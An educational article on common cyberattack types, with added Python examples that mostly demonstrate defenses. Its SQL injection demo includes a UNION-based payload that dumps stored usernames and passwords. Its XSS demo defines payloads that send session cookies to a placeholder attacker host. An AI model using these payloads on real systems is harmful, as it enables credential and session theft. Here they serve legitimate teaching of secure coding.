Types of Cybersecurity Attacks

Learn what a cybersecurity attack is and the types of threats you are likely to face.

What is a cyber attack?

A cyber attack, also known as a cybersecurity attack, is any form of malicious activity targeting IT systems and/or the people who use them in order to gain unauthorized access to those systems and the data they contain.

Criminals usually carry out attacks for financial gain, but in other cases the aim is to disrupt operations by denying access to IT systems. Threat actors range from a single person trying to obtain stolen credentials and hold them for ransom to a state-sponsored group intent on disrupting operations on foreign soil. Whatever the motivation, most IT networks, and the people who maintain them, will experience some type of attack over their lifetime and must be prepared for it.

7 Common Types of Cyber Attacks

If you have ever studied famous battles in history, you will know that no two are exactly alike. Still, some tactics have proven effective over time. Similarly, when a criminal tries to break into an organization, they will not try something new unless absolutely necessary. They rely on common hacking techniques known to work very well, such as malware, phishing, or cross-site scripting (XSS).

Whether you are trying to make sense of the latest data-breach headline or analyzing an incident in your own organization, it helps to understand the different attack vectors. Let's look at some of the most common types of cyber attacks seen today.

Malware

Malware refers to various forms of harmful software, such as viruses and ransomware. Once malware is on your computer, it can cause all kinds of damage, from taking control of your machine and monitoring your actions and keystrokes to silently sending confidential data from your computer or network to the attacker's home base.

Attackers use a variety of methods to get malware onto your computer, but at some stage it usually requires the user to take an action that installs it. This can be clicking a link to download a file, or opening an apparently harmless email attachment (such as a document or PDF) that actually contains a hidden malware installer.

Phishing

In a phishing attack, the attacker sends you an email that appears to come from someone you trust, such as your boss or a company you do business with. The email looks legitimate and carries a sense of urgency (e.g., "fraudulent activity has been detected on your account"). It contains an attachment to open or a link to click.

Opening the malicious attachment installs malware on your computer without your knowledge. If you click the link, it may take you to a legitimate-looking website that asks you to log in to access an important file, except that the website is actually a trap built to capture your credentials. To counter phishing attempts, it is essential to verify the sender before acting on any attachment or link.

SQL Injection Attack

An SQL injection attack targets the servers that store critical website and service data, using malicious input to make the database divulge information it normally would not. SQL (Structured Query Language) is the language used to query relational databases, and those databases often hold private customer information such as credit card numbers, usernames and passwords (credentials), or other personally identifiable information (PII), all tempting and lucrative targets for an attacker.

An SQL injection attack works by exploiting an application that builds SQL statements from untrusted input without separating the query from the data, so the attacker's input changes the statement the database actually executes. For example, if a site's search feature is vulnerable to injection, an attacker can type crafted input into the search box that forces the back-end database to return all of its stored usernames and passwords.
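The search-box scenario above, as an added example (this code is not from the original page). The tables, rows and the product search are constructed for the demonstration; SQLite is used only because it needs no server.

```python
import sqlite3

# Constructed demo data (not from the original page): a small catalogue table that a
# site's search box queries, next to the users table the attacker actually wants.
def make_demo_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products (name) VALUES (?)",
                     [("router",), ("switch",), ("firewall",)])
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("alice", "hunter2"), ("bob", "letmein"), ("carol", "qwerty")])
    return conn

def search_vulnerable(conn, term):
    # VULNERABLE: the search term is pasted into the SQL text, so whoever controls the
    # term controls the structure of the statement, not merely a value inside it.
    sql = "SELECT name FROM products WHERE name LIKE '%" + term + "%'"
    return [row[0] for row in conn.execute(sql)]

def search_safe(conn, term):
    # SAFE: the statement is fixed; the driver binds the term as one string value, so
    # quotes, UNION keywords or comment markers inside it are just characters to match.
    sql = "SELECT name FROM products WHERE name LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + term + "%",))]

# What the attacker types into the search box. The leading quote closes the LIKE
# literal, UNION appends a second query against the users table, and "--" comments
# out the trailing "%'" so the statement still parses.
INJECTION = "x%' UNION SELECT username || ':' || password FROM users -- "

if __name__ == "__main__":
    db = make_demo_db()
    print("normal search:", search_safe(db, "rout"))
    print("vulnerable search with payload:", sorted(search_vulnerable(db, INJECTION)))
    print("safe search with payload:", search_safe(db, INJECTION))
```

The vulnerable version returns every username and password in the users table for the injected term; the parameterized version returns nothing, because the same text is now matched as a (nonexistent) product name. Parameterized queries, not quote-escaping, are the fix.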

Cross-Site Scripting (XSS)

A cross-site scripting (XSS) attack also involves injecting malicious code into a website, but in this case the website itself is not the target. Instead, the malicious code runs only in the visitor's browser when they view the attacked website, where it targets the visitor directly.

One of the most common ways to deploy an XSS attack is to inject malicious code into a comment field whose contents the site later shows to other visitors without encoding, or into a script that runs automatically. For example, the attacker could embed malicious JavaScript in a comment on a blog. Cross-site scripting attacks can significantly damage a website's reputation by putting users' information at risk without any indication that something malicious has happened.

Denial of Service (DoS)

A denial-of-service (DoS) attack floods a website with more traffic than it was built to handle, overloading the site's server and making it nearly impossible to serve content to visitors. Denial of service can also happen for non-malicious reasons, for example when a massive news story breaks and a news organization's site is swamped by people trying to learn more.

More often, though, the overload is malicious: an attacker floods the site with an overwhelming volume of traffic to effectively shut it down for all users. In some cases the traffic comes from many computers at the same time; that scenario is called a distributed denial-of-service (DDoS) attack.

Session Hijacking

In a normal web session, the server responds to your requests with the information you asked for and recognizes you between requests by a unique, and private, session ID. Session hijacking occurs when an attacker captures that session ID and presents it as if they were your computer, letting them act as an unsuspecting user and access information on the web server they are not authorized to see.

An attacker has many ways to steal a session ID, for example a cross-site scripting attack that reads the session cookie from the victim's browser. The attacker can also insert themselves between the requesting computer and the remote server, pretending to be the other party to each side. This lets them intercept information in both directions and is commonly called a man-in-the-middle (MITM) attack.
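What a session ID has to look like, and how the cookie that carries it can be protected against the two theft routes just described (script access and on-path interception), as an added example that is not part of the original page. The session store, the cookie attributes and the weak counter-based ID are all constructed for illustration.

```python
import secrets

# Added example (not from the original page): a minimal server-side session table.
class SessionStore:
    def __init__(self):
        self._sessions = {}   # session ID -> username

    def create(self, username):
        # 32 bytes from the OS CSPRNG (256 bits of entropy): an attacker cannot
        # enumerate or predict it from IDs they have already seen.
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = username
        return sid

    def lookup(self, sid):
        return self._sessions.get(sid)

    def revoke(self, sid):
        self._sessions.pop(sid, None)

    def rotate_on_login(self, old_sid, username):
        # Issue a fresh ID at the moment of authentication, so an ID the attacker planted
        # or observed before login (session fixation) never becomes a logged-in one.
        self.revoke(old_sid)
        return self.create(username)

def weak_session_id(counter):
    # WEAK, for contrast: with sequential IDs an attacker holding 00000041 can simply
    # present 00000042 and take over the next user's session.
    return f"{counter:08d}"

def set_cookie_header(sid):
    # HttpOnly: document.cookie cannot read it, so an XSS payload cannot exfiltrate it.
    # Secure: sent only over HTTPS, so a man-in-the-middle on the path cannot sniff it.
    # SameSite=Strict: not attached to requests initiated by other sites.
    return f"Set-Cookie: session={sid}; Path=/; HttpOnly; Secure; SameSite=Strict"

if __name__ == "__main__":
    store = SessionStore()
    pre_login = store.create("anonymous")
    sid = store.rotate_on_login(pre_login, "alice")
    print(set_cookie_header(sid))
    print("old ID still valid?", store.lookup(pre_login) is not None)
```

Random IDs stop guessing, rotation on login stops fixation, and the cookie flags stop the browser from handing the ID to a script or sending it in the clear; none of these alone is sufficient, which is why all three belong together.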

Credential Reuse

Credential reuse occurs when someone uses the same credentials on multiple websites. It makes life easier in the moment but can come back to haunt that user later. Even though security best practice universally recommends a unique password for every application and website, many people still reuse their passwords, a fact attackers exploit with ease.

Once attackers have collected compromised credentials from a breached website or service (easily acquired on any number of black-market sites), they know there is a good chance those credentials will work somewhere else online. When it comes to credentials, variety is essential. Password managers can generate and keep track of unique passwords for every corner of the internet.
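Two checks a user or a security team can run against this, as an added example that is not part of the original page: whether a password already appears in a breach corpus, looked up so that the password itself never leaves the client, and which sites in a set of stored logins share a password. The breach corpus and the vault contents are constructed for the demonstration; the prefix-based lookup follows the k-anonymity range-query scheme used by public breached-password services.

```python
import hashlib

# Constructed stand-in for a breach corpus (made up for this example, not real breach
# data): SHA-1 digests of a few passwords that recur in leaked credential lists.
# SHA-1 is used here only as a lookup key into the corpus, not to store passwords.
BREACHED_SHA1 = {
    hashlib.sha1(p.encode()).hexdigest().upper()
    for p in ("password", "123456", "qwerty", "letmein", "hunter2")
}

def range_lookup(prefix5):
    # Emulates a k-anonymity range query: the lookup service sees only the first five
    # hex characters of the hash and returns every suffix it holds under that prefix,
    # so neither the password nor its full hash is disclosed to the service.
    return sorted(h[5:] for h in BREACHED_SHA1 if h.startswith(prefix5))

def is_breached(password):
    digest = hashlib.sha1(password.encode()).hexdigest().upper()
    return digest[5:] in range_lookup(digest[:5])

def find_reused(vault):
    # vault: {site: password}. Returns {password: [sites]} for every password used on
    # more than one site, i.e. the accounts that fall together if any one of them leaks.
    sites_by_password = {}
    for site, pw in vault.items():
        sites_by_password.setdefault(pw, []).append(site)
    return {pw: sorted(s) for pw, s in sites_by_password.items() if len(s) > 1}

def audit(vault):
    # One report per site combining both checks.
    reused = find_reused(vault)
    return {site: {"breached": is_breached(pw), "reused": pw in reused}
            for site, pw in vault.items()}

if __name__ == "__main__":
    # Constructed vault contents for the demonstration.
    demo_vault = {"bank": "S9#kq2!vLpX", "mail": "S9#kq2!vLpX",
                  "forum": "letmein", "vpn": "Zr4!mQ7pWn2"}
    for site, verdict in audit(demo_vault).items():
        print(site, verdict)
```

An account flagged as "reused" is exposed even though its password is strong: a breach of the forum's database would hand the attacker working logins for the bank and the mail account, which is exactly the replay described above.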

How to Defend Against Cyber Attacks

We could cover thousands of tactics and tips for preventing large-scale cyber attacks, but let's zoom in on a few key examples:

Phishing awareness training: Educate employees on why phishing is harmful and empower them to detect and report phishing attempts. This type of training includes sending simulated phishing campaigns to employees by email, monitoring the results, reinforcing the training, and improving on the simulation results.

Compromised credential detection: Use user behavior analytics to establish a baseline of normal activity on your network. Then monitor how administrator and service accounts are being used, which users are inappropriately sharing credentials, and whether an attacker has already expanded from the initial compromise into the rest of your network.
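The kind of detection logic that item describes, run over a handful of sample authentication events, as an added example that is not part of the original page. The log format, the events and the per-account baseline are all constructed for the demonstration; a real deployment would learn the baseline from weeks of history and read events from the identity provider.

```python
from collections import defaultdict

# Constructed authentication log (made up for this example; the format is an assumption):
# "<timestamp> <user> <FAIL|SUCCESS> <source_ip>", one event per line.
SAMPLE_LOG = """\
2023-06-01T09:00:01 alice      FAIL    203.0.113.5
2023-06-01T09:00:02 bob        FAIL    203.0.113.5
2023-06-01T09:00:03 carol      FAIL    203.0.113.5
2023-06-01T09:00:04 dave       FAIL    203.0.113.5
2023-06-01T09:00:05 erin       SUCCESS 203.0.113.5
2023-06-01T09:05:00 alice      SUCCESS 10.0.0.12
2023-06-01T10:00:00 svc-backup SUCCESS 10.0.0.12
2023-06-01T11:00:00 svc-backup SUCCESS 10.0.0.77
2023-06-01T12:00:00 svc-backup SUCCESS 10.0.0.91
2023-06-01T12:30:00 alice      SUCCESS 10.0.0.12
"""

# Baseline of the source IPs each account normally authenticates from (constructed).
BASELINE = {"alice": {"10.0.0.12"}, "svc-backup": {"10.0.0.12"}}

def parse(log_text):
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, user, result, ip = line.split()
        events.append({"ts": ts, "user": user, "result": result, "ip": ip})
    return events

def stuffing_sources(events, min_distinct_users=4):
    # One source failing against many *different* accounts is the signature of a
    # replayed breach list (credential stuffing), unlike one user mistyping a password.
    failed_users = defaultdict(set)
    for e in events:
        if e["result"] == "FAIL":
            failed_users[e["ip"]].add(e["user"])
    return sorted(ip for ip, users in failed_users.items() if len(users) >= min_distinct_users)

def likely_compromised(events, min_distinct_users=4):
    # A success from a source already flagged for stuffing means one of the reused
    # credentials worked: lock that account and force a password change.
    bad = set(stuffing_sources(events, min_distinct_users))
    return sorted({e["user"] for e in events if e["result"] == "SUCCESS" and e["ip"] in bad})

def off_baseline_accounts(events, baseline, max_new_sources=1):
    # Successful logins from more sources than the baseline allows point at shared
    # credentials or at an attacker moving from the initial foothold to other hosts;
    # service accounts in particular should rarely roam between machines.
    sources = defaultdict(set)
    for e in events:
        if e["result"] == "SUCCESS":
            sources[e["user"]].add(e["ip"])
    flagged = [user for user, ips in sources.items()
               if len(ips - baseline.get(user, set())) > max_new_sources]
    return sorted(flagged)

if __name__ == "__main__":
    evts = parse(SAMPLE_LOG)
    print("stuffing sources:", stuffing_sources(evts))
    print("accounts the stuffing got into:", likely_compromised(evts))
    print("accounts roaming off baseline:", off_baseline_accounts(evts, BASELINE))
```

The three detectors map onto the three questions in the item: the first two catch credentials that were compromised and replayed, the third catches a service account turning up on hosts it never used before, which is what credential sharing or lateral movement looks like in an authentication log.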

Ransomware prevention: Develop a three-point plan to prevent ransomware attacks. This includes minimizing the attack surface, mitigating the potential impact once an exposure is detected, and debriefing to identify gaps in the existing plan. From there, teams can rebuild systems, quarantine endpoints, change credentials, and lock down compromised accounts.

Protecting against XSS attacks: Establish a filtering strategy that all external data passes through before it is written into a page, so malicious scripts are neutralized before they become a problem. This leads into a wider content security policy that restricts the sources from which your web pages may load scripts to a list of trusted origins.
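The blog-comment attack from the XSS section above and the two defenses in this item, side by side, as an added example that is not part of the original page. The payloads, the attacker host and the trusted script host are constructed placeholders; the escaping uses Python's standard library and is correct only for an HTML text context (attribute, URL and JavaScript contexts need their own encoders).

```python
import html

# Constructed payloads (made up for this example): what an attacker submits as a blog
# comment. The first steals the session cookie; the second contains no <script> tag at all.
PAYLOAD_SCRIPT = "<script>new Image().src='https://attacker.example/c?'+document.cookie</script>"
PAYLOAD_IMG = '<img src=x onerror="new Image().src=\'https://attacker.example/c?\'+document.cookie">'

def render_vulnerable(comment):
    # VULNERABLE: the stored comment is pasted into the page; the browser parses the
    # attacker's markup and runs the script in every visitor's session.
    return f'<div class="comment">{comment}</div>'

def render_blocklist(comment):
    # STILL VULNERABLE: stripping the word "script" is the kind of "filter" that fails;
    # event-handler attributes, javascript: URLs and encoded variants all slip past it.
    cleaned = comment.replace("<script>", "").replace("</script>", "")
    return f'<div class="comment">{cleaned}</div>'

def render_safe(comment):
    # SAFE for an HTML text context: &, <, >, " and ' become entities, so the browser
    # displays the payload as literal text and never treats it as markup.
    return f'<div class="comment">{html.escape(comment, quote=True)}</div>'

def content_security_policy(trusted_script_host):
    # Defence in depth: even if a payload reaches the page, scripts may only load from
    # the site's own origin and one trusted host. Inline scripts and event handlers are
    # blocked because 'unsafe-inline' is absent. trusted_script_host is a placeholder.
    return ("Content-Security-Policy: default-src 'self'; "
            f"script-src 'self' {trusted_script_host}; object-src 'none'; base-uri 'self'")

def has_markup(rendered):
    # Does anything that would open a tag survive inside the comment div?
    inner = rendered[len('<div class="comment">'):-len("</div>")]
    return "<" in inner

if __name__ == "__main__":
    for name, renderer in (("vulnerable", render_vulnerable),
                           ("blocklist", render_blocklist),
                           ("escaped", render_safe)):
        print(f"{name:10} script payload executes: {has_markup(renderer(PAYLOAD_SCRIPT))}"
              f"  img payload executes: {has_markup(renderer(PAYLOAD_IMG))}")
    print(content_security_policy("https://cdn.example"))
```

The blocklist row is the important one: it "catches" the obvious payload and lets the event-handler variant through, which is why the filtering strategy has to be contextual output encoding rather than keyword removal, with the CSP as the backstop for anything the encoder misses.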

Threat intelligence program: Create a central hub that feeds every security function with knowledge and data on the highest-priority threats. Organizations rely heavily on automation to scale a threat intelligence program, continuously feeding that data into security devices and processes without human intervention.